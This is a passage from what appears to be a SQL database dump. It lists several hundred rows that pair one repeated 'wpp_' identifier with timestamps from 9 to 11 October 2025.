13:08:31'),(10120,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 13:32:26'),(10121,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 13:40:52'),(10122,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 14:00:15'),(10123,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 14:12:34'),(10124,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 14:32:55'),(10125,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 14:38:30'),(10126,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 14:42:59'),(10127,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 14:48:02'),(10128,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 14:50:02'),(10129,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 15:05:25'),(10130,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 15:13:46'),(10131,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 15:15:08'),(10132,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 15:17:23'),(10133,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 15:51:25'),(10134,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 15:54:06'),(10135,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 16:02:44'),(10136,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 16:03:48'),(10137,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 16:04:49'),(10138,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 16:05:58'),(10139,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 16:26:34'),(10140,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 16:28:09'),(10141,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 16:29:10'),(10142,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 16:30:18'),(10143,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 16:31:22'),(10144,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 16:36:11'),(10145,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 16:48:20'),(10146,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 16:49:32'),(10147,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:00:31'),(10148,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:06:17'),(10149,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:09:37'),(10150,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:13:49'),(10151,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:16:33'),(10152,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:17:41'),(10153,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:25:18'),(10154,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:26:25'),(10155,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:30:20'),(10156,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:32:02'),(10157,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:33:59'),(10158,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:35:10'),(10159,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:36:47'),(10160,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:38:06'),(10161,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:41:31'),(10162,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:45:08'),(10163,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:47:13'),(10164,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:50:53'),(10165,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:52:32'),(10166,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:54:00'),(10167,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 17:55:04'),(10168,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 18:01:48'),(10169,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 18:07:16'),(10170,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 18:09:58'),(10171,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 18:15:30'),(10172,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 18:23:21'),(10173,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 18:48:57'),(10174,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 18:51:00'),(10175,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 18:58:59'),(10176,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 19:23:20'),(10177,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 19:34:21'),(10178,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 19:55:44'),(10179,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 20:07:02'),(10180,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 20:08:37'),(10181,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 20:22:04'),(10182,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 20:38:14'),(10183,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 21:01:08'),(10184,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 21:14:21'),(10185,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 21:39:52'),(10186,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 21:48:42'),(10187,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 21:50:01'),(10188,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 22:16:10'),(10189,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 22:20:33'),(10190,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 22:46:06'),(10191,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 22:58:18'),(10192,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 23:08:19'),(10193,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 23:31:05'),(10194,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 23:34:45'),(10195,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-09 23:37:36'),(10196,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 00:02:51'),(10197,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 00:23:11'),(10198,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 00:27:28'),(10199,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 01:25:25'),(10200,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 01:40:32'),(10201,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 01:41:52'),(10202,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 01:46:31'),(10203,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 01:50:41'),(10204,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 02:00:20'),(10205,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 02:03:13'),(10206,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 02:24:01'),(10207,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 02:26:01'),(10208,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 02:37:58'),(10209,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 02:48:29'),(10210,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 02:54:12'),(10211,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 03:13:10'),(10212,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 03:47:49'),(10213,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 04:05:42'),(10214,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 04:12:35'),(10215,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 04:24:58'),(10216,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 04:29:24'),(10217,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 04:40:40'),(10218,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 04:48:59'),(10219,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 04:56:41'),(10220,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 04:58:09'),(10221,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 05:11:43'),(10222,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 05:56:30'),(10223,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 06:26:06'),(10224,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 06:53:37'),(10225,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 07:04:46'),(10226,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 07:59:35'),(10227,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 08:13:46'),(10228,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 08:26:15'),(10229,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 08:49:50'),(10230,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 08:56:31'),(10231,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 08:59:29'),(10232,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 09:12:12'),(10233,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 09:33:34'),(10234,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 09:43:12'),(10235,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 09:57:47'),(10236,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 10:05:30'),(10237,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 10:12:41'),(10238,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 10:40:27'),(10239,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 10:44:46'),(10240,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 11:15:27'),(10241,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 11:20:01'),(10242,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 11:25:01'),(10243,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 11:26:52'),(10244,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 11:53:00'),(10245,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 12:11:41'),(10246,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 12:17:38'),(10247,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 12:43:23'),(10248,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 12:53:27'),(10249,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 13:01:55'),(10250,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 13:11:52'),(10251,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 13:15:36'),(10252,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 13:21:20'),(10253,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 13:31:56'),(10254,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 13:50:57'),(10255,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 14:07:23'),(10256,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 14:24:42'),(10257,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 14:34:30'),(10258,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 14:36:23'),(10259,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 14:52:45'),(10260,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 14:57:40'),(10261,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 15:12:07'),(10262,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 15:18:12'),(10263,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 15:25:52'),(10264,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 15:33:30'),(10265,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 15:39:26'),(10266,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 15:45:17'),(10267,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 15:46:41'),(10268,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 16:26:21'),(10269,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 16:28:56'),(10270,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 16:32:40'),(10271,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 16:40:03'),(10272,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 16:49:52'),(10273,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:11:57'),(10274,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:15:04'),(10275,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:17:33'),(10276,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:19:27'),(10277,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:22:35'),(10278,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:40:28'),(10279,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:45:45'),(10280,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:46:51'),(10281,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:47:53'),(10282,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:48:55'),(10283,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:50:07'),(10284,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:54:27'),(10285,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:55:51'),(10286,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 17:59:29'),(10287,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:02:54'),(10288,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:04:27'),(10289,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:05:29'),(10290,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:08:03'),(10291,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:11:48'),(10292,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:13:27'),(10293,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:16:02'),(10294,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:17:15'),(10295,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:23:59'),(10296,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:30:38'),(10297,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:34:01'),(10298,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:38:58'),(10299,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 18:42:57'),(10300,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 19:12:06'),(10301,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 19:14:36'),(10302,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 19:28:58'),(10303,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 19:44:32'),(10304,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 19:48:54'),(10305,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 20:14:13'),(10306,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 20:18:39'),(10307,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 20:30:31'),(10308,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 20:50:49'),(10309,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 20:52:12'),(10310,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 21:49:27'),(10311,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 21:59:32'),(10312,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 22:15:51'),(10313,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 22:16:57'),(10314,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 22:20:07'),(10315,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 22:36:57'),(10316,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-10 23:31:36'),(10317,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:00:50'),(10318,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:03:30'),(10319,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:14:21'),(10320,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:15:28'),(10321,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:22:57'),(10322,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:26:24'),(10323,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:29:19'),(10324,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:33:48'),(10325,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:35:44'),(10326,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:37:32'),(10327,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:39:01'),(10328,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:40:47'),(10329,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:43:24'),(10330,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:45:52'),(10331,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:48:27'),(10332,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:51:05'),(10333,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:52:58'),(10334,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:55:06'),(10335,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 00:57:18'),(10336,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:00:03'),(10337,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:01:27'),(10338,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:03:31'),(10339,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:08:24'),(10340,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:10:50'),(10341,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:17:45'),(10342,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:18:58'),(10343,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:24:50'),(10344,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:27:04'),(10345,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:29:07'),(10346,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:37:34'),(10347,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:40:30'),(10348,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:47:11'),(10349,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:50:18'),(10350,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:51:22'),(10351,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:52:26'),(10352,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:56:21'),(10353,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:57:24'),(10354,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 01:58:31'),(10355,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 02:00:08'),(10356,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 02:01:15'),(10357,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 02:02:29'),(10358,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 02:03:51'),(10359,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 02:11:34'),(10360,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 02:21:29'),(10361,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 02:55:17'),(10362,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 03:16:28'),(10363,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 03:32:50'),(10364,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 03:54:10'),(10365,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 04:00:55'),(10366,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 04:04:30'),(10367,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 04:10:27'),(10368,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 04:38:16'),(10369,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 04:39:19'),(10370,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 04:53:44'),(10371,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 04:58:50'),(10372,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 05:48:36'),(10373,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 05:55:08'),(10374,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 05:56:46'),(10375,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 06:00:28'),(10376,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 06:03:45'),(10377,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 06:17:05'),(10378,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 06:21:03'),(10379,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 07:10:41'),(10380,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 07:33:49'),(10381,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 07:45:01'),(10382,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 07:52:24'),(10383,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 08:02:30'),(10384,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 08:03:55'),(10385,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 08:08:38'),(10386,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 08:09:39'),(10387,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 08:11:01'),(10388,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 08:12:02'),(10389,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 08:13:07'),(10390,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 08:14:08'),(10391,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 08:19:44'),(10392,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 08:22:58'),(10393,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 08:37:05'),(10394,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 08:40:26'),(10395,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 09:05:44'),(10396,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 09:15:53'),(10397,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 09:32:07'),(10398,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 09:57:33'),(10399,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 10:06:18'),(10400,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 10:12:32'),(10401,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 10:17:03'),(10402,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 11:04:05'),(10403,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 11:10:41'),(10404,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 11:19:23'),(10405,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 11:21:42'),(10406,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 11:31:25'),(10407,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 11:33:41'),(10408,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 11:45:46'),(10409,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 11:52:27'),(10410,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 12:22:57'),(10411,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 12:38:53'),(10412,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 12:40:11'),(10413,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 12:51:07'),(10414,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 12:59:10'),(10415,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 13:00:20'),(10416,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 13:04:08'),(10417,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 13:15:11'),(10418,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 13:16:47'),(10419,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 13:25:33'),(10420,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 13:38:56'),(10421,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 13:39:59'),(10422,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 13:48:13'),(10423,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 13:49:31'),(10424,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 13:55:12'),(10425,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:00:43'),(10426,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:02:38'),(10427,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:11:09'),(10428,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:12:45'),(10429,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:21:21'),(10430,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:25:34'),(10431,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:34:52'),(10432,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:35:53'),(10433,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:41:49'),(10434,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:44:26'),(10435,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:46:57'),(10436,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:48:20'),(10437,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:49:34'),(10438,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:53:19'),(10439,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:57:30'),(10440,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:58:33'),(10441,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 14:59:44'),(10442,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 15:02:21'),(10443,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 15:04:10'),(10444,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 15:05:29'),(10445,'wpp_bf738b949e164b2ad4e418e5c570bdd7','2025-10-11 